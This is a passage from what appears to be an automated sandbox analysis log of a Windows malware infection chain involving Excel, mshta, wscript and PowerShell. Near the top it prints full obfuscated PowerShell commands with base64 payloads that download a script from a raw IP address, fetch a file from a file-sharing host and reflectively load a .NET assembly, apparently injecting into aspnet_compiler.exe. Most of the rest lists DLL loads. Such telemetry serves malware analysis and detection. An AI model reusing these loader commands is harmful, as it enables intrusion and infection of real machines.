IgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64cpu.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

